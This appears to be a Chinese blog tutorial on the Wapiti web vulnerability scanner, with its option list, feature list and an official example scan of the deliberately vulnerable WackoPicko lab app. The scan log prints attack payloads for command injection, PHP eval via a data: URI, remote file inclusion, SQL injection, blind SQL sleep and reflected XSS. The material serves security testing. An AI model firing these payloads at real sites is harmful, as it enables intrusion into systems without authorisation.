Wapiti web掃描工具使用——支持ssl，看官方示例報告就知道如何支持帶cookie和用戶名密碼的掃描了

Wapiti 是一個基於命令行單Web漏洞掃描器，通過給目標站點發送 GET 和 POST 請求查找如下漏洞： (http://wapiti.sourceforge.net/):

• File disclosure
• 數據庫注入
• XSS (跨站腳本)
• Command execution detection
• CRLF injection
• XXE (XML eXternal Entity) injection
• Use of known potentially dangerous files
• Weak .htaccess configurations that can be bypassed
• 包含敏感信息的備份文件 (source code disclosure)

這篇文字，討論如何利用 Wapiti 進行測試應用漏洞單發現和掃描報告的生成

實踐

1. 命令行調用 Wapiti：

作者：半個王國
鏈接：https://www.jianshu.com/p/d550d7b820a9

上述方式有問題，最新版命令已經改變：

Usage: wapiti [options]

可選參數:
  -h, --help 顯示此幫助消息並退出 -u URL, --url URL 定義掃描范圍的基礎URL 默認掃描范圍是folder --scope {page, folder, domain, url, punk} 設置掃描范圍 -m MODULES_LIST, --module MODULES_LIST 加載模塊列表 --list-modules 列出Wapiti攻擊模塊並退出 -l LEVEL, --level LEVEL 設置攻擊等級  -p PROXY_URL, --proxy PROXY_URL 設置HTTP(S)代理 支持HTTP(S), SOCKS --tor 使用Tor監聽器 (127.0.0.1:9050)  -a CREDENTIALS, --auth-cred CREDENTIALS 設置HTTP認證憑據 --auth-type {basic, digest, kerberos, ntlm} 設置認證類型 -c COOKIE_FILE, --cookie COOKIE_FILE 設置json格式的Cookie文件 --skip-crawl 不恢復之前會話記錄的掃描進程 --resume-crawl 即使先前曾進行過某些已停止的攻擊也可以恢復掃描進程 --flush-attacks 放棄當前會話的攻擊歷史和漏洞信息 --flush-session 放棄所有之前發現的當前目標的所有信息包括爬取的URL和漏洞等 --store-session PATH 存儲攻擊歷史記錄和會話數據的目錄 -s URL, --start URL 添加起始掃描URL -x URL, --exclude URL 添加要排除的URL -r PARAMETER, --remove PARAMETER 刪除URL中的給定的參數 --skip PARAMETER 不攻擊給定的參數 -d DEPTH, --depth DEPTH 設置掃描深度 --max-links-per-page MAX 設置掃描范圍內每一頁面提取的鏈接數 --max-files-per-dir MAX 設置每一目錄探索的頁面數 --max-scan-time MINUTES 設置掃描持續時間float分鍾數 --max-parameters MAX 擁有超過最大輸入參數的URL和表單在攻擊前會被刪除 -S FORCE, --scan-force FORCE 減少掃描和攻擊的URL的簡單辦法 可選值: paranoid, sneaky, polite, normal, aggressive, insane -t SECONDS, --timeout SECONDS 設置請求超時時間 -H HEADER, --header HEADER 設置每次請求的首部 -A AGENT, --user-agent AGENT 設置每次請求的User-Agent --verify-ssl {0, 1} 是否檢查SSL 默認不檢查 --color 使用顏色美化輸出 -v LEVEL, --verbose LEVEL 設置詳細度 (0: quiet, 1: normal, 2: verbose) -f FORMAT, --format FORMAT 設置輸出格式 支持: json, html(default), txt, openvas, vulneranet, xml -o OUPUT_PATH, --output OUPUT_PATH 輸出文件或目錄 --external-endpoint EXTERNAL_ENDPOINT_URL Url serving as endpoint for target --internal-endpoint INTERNAL_ENDPOINT_URL Url serving as endpoint for attacker --endpoint ENDPOINT_URL Url serving as endpoint for both attacker and target --no-bugreport 當攻擊模塊失敗時不發送Bug報告 --version 打印程序版本號

What's new in Wapiti 3.0.3 ? Take a look here.

Wapiti can detect the following vulnerabilities :

• File disclosure (Local and remote include/require, fopen, readfile...)
• Database Injection (PHP/JSP/ASP SQL Injections and XPath Injections)
• XSS (Cross Site Scripting) injection (reflected and permanent)
• Command Execution detection (eval(), system(), passtru()...)
• CRLF Injection (HTTP Response Splitting, session fixation...)
• XXE (XML External Entity) injection
• SSRF (Server Side Request Forgery)
• Use of know potentially dangerous files (thanks to the Nikto database)
• Weak .htaccess configurations that can be bypassed
• Presence of backup files giving sensitive information (source code disclosure)
• Shellshock (aka Bash bug)
• Open Redirects
• Uncommon HTTP methods that can be allowed (PUT)

 

General features

• Generates vulnerability reports in various formats (HTML, XML, JSON, TXT...).
• Can suspend and resume a scan or an attack (session mechanism using sqlite3 databases).
• Can give you colors in the terminal to highlight vulnerabilities.
• Different levels of verbosity.
• Fast and easy way to activate/deactivate attack modules.
• Adding a payload can be as easy as adding a line to a text file.

Browsing features

• Support HTTP, HTTPS and SOCKS5 proxies.
• Authentication on the target via several methods : Basic, Digest, Kerberos or NTLM.
• Ability to restrain the scope of the scan (domain, folder, page, url).
• Automatic removal of one or more parameters in URLs.
• Multiple safeguards against scan endless-loops (for example, limit of values for a parameter).
• Possibility to set the first URLs to explore (even if not in scope).
• Can exclude some URLs of the scan and attacks (eg: logout URL).
• Import of cookies (get them with the wapiti-getcookie tool).
• Can activate / deactivate SSL certificates verification.
• Extract URLs from Flash SWF files.
• Try to extract URLs from javascript (very basic JS interpreter).
• HTML5 aware (understand recent HTML tags).
• Several options to control the crawler behavior and limits.
• Skipping some parameter names during attack.
• Setting a maximum time for the scan process.
• Adding some custom HTTP headers or setting a custom User-Agent.

 

看官方的示例報告就知道是如何支持cookie和用戶名、密碼的掃描了：

 

Hello,

Here is a really fast tutorial on Wapiti and Wapiti-getcookie usage to show how to login to a website to retrieve cookies
then use the generated cookie file to launch a Wapiti scan.

First, I use wapiti-getcookie to login in the restricted area and get the cookie in cookies.json :

bash-4.2$ wapiti-getcookie -u http://wackopicko/users/login.php -c cookies.json
<Cookie PHPSESSID=aofe1utktsh6q4blip8nr9820lksehjf0tr3019vm6bq8v1ca6d1 for wackopicko/>

Choose the form you want to use or enter 'q' to leave :
0) GET http://wackopicko/pictures/search.php?query=&x=1&y=1 (0)
1) POST http://wackopicko/users/login.php (0)
        data: username=&password=

Enter a number : 1

Please enter values for the following form:
url = http://wackopicko/users/login.php
username: wanda
password: wanda
<Cookie PHPSESSID=aofe1utktsh6q4blip8nr9820lksehjf0tr3019vm6bq8v1ca6d1 for wackopicko/>

It can also be done with wapiti-getcookie this way (if you have all necessary informations about the form) :
wapiti-getcookie -u http://wackopicko/users/login.php -c cookies.json -d "username=wanda&password=wanda"

Then, I scan the vulnerable website using the cookie and excluding the logout script :

bash-4.2$ wapiti -u http://wackopicko/ -x http://wackopicko/users/logout.php -c cookies.json
    __      __               .__  __  .__________
   /  \    /  \_____  ______ |__|/  |_|__\_____  \ 
   \   \/\/   /\__  \ \____ \|  \   __\  | _(__  <
    \        /  / __ \|  |_> >  ||  | |  |/       \ 
     \__/\  /  (____  /   __/|__||__| |__/______  /
          \/        \/|__|                      \/

Wapiti-3.0.0 (wapiti.sourceforge.net)
[*] Saving scan state, please wait...

 Note
========
This scan has been saved in the file /home/devloop/.wapiti/scans/wackopicko_folder_30e1d821.db
[*] Wapiti found 41 URLs and forms during the scan
[*] Loading modules:
         mod_crlf, mod_exec, mod_file, mod_sql, mod_xss, mod_backup, mod_htaccess, mod_blindsql, mod_permanentxss, mod_nikto, mod_delay, mod_buster, mod_shellshock

[*] Launching module exec
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
    GET /users/WackoPicko/website/admin/index.php?page=%3Benv HTTP/1.1
    Host: wackopicko
---
---
PHP evaluation in http://wackopicko/admin/index.php via injection in the parameter page
Evil request:
    GET /users/WackoPicko/website/admin/index.php?page=data%3A%3Bbase64%2CPD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA%2FPg%3D%3D HTTP/1.1
    Host: wackopicko
---
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
    POST /users/WackoPicko/website/admin/index.php?page=%3Benv HTTP/1.1
    Host: wackopicko
    Referer: http://wackopicko/admin/index.php?page=login
    Content-Type: application/x-www-form-urlencoded

    adminname=default&password=letmein
---
---
PHP evaluation in http://wackopicko/admin/index.php via injection in the parameter page
Evil request:
    POST /users/WackoPicko/website/admin/index.php?page=data%3A%3Bbase64%2CPD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA%2FPg%3D%3D HTTP/1.1
    Host: wackopicko
    Referer: http://wackopicko/admin/index.php?page=login
    Content-Type: application/x-www-form-urlencoded

    adminname=default&password=letmein
---

[*] Launching module file
---
Remote inclusion vulnerability in http://wackopicko/admin/index.php via injection in the parameter page
Evil request:
    GET /users/WackoPicko/website/admin/index.php?page=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
    Host: wackopicko
---
---
Remote inclusion vulnerability in http://wackopicko/admin/index.php via injection in the parameter page
Evil request:
    POST /users/WackoPicko/website/admin/index.php?page=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
    Host: wackopicko
    Referer: http://wackopicko/admin/index.php?page=login
    Content-Type: application/x-www-form-urlencoded

    adminname=default&password=letmein
---

[*] Launching module sql
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
    GET /users/WackoPicko/website/admin/index.php?page=%C2%BF%27%22%28 HTTP/1.1
    Host: wackopicko
---
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
    POST /users/WackoPicko/website/admin/index.php?page=%C2%BF%27%22%28 HTTP/1.1
    Host: wackopicko
    Referer: http://wackopicko/admin/index.php?page=login
    Content-Type: application/x-www-form-urlencoded

    adminname=default&password=letmein
---

[*] Launching module xss
---
XSS vulnerability in http://wackopicko/pictures/search.php via injection in the parameter query
Evil request:
    GET /users/WackoPicko/website/pictures/search.php?query=%22%2F%3E%3Cscript%3Ealert%28%27wj6bncic12%27%29%3C%2Fscript%3E&x=1&y=1 HTTP/1.1
    Host: wackopicko
    Referer: http://wackopicko/
---

[*] Launching module blindsql
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
    GET /users/WackoPicko/website/admin/index.php?page=sleep%287%29%231 HTTP/1.1
    Host: wackopicko
---
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
    POST /users/WackoPicko/website/admin/index.php?page=sleep%287%29%231 HTTP/1.1
    Host: wackopicko
    Referer: http://wackopicko/admin/index.php?page=login
    Content-Type: application/x-www-form-urlencoded

    adminname=default&password=letmein
---

[*] Launching module permanentxss

Report
------
A report has been generated in the file /home/devloop/.wapiti/generated_report
Open /home/devloop/.wapiti/generated_report/wackopicko_12292017_1342.html with a browser to see this report.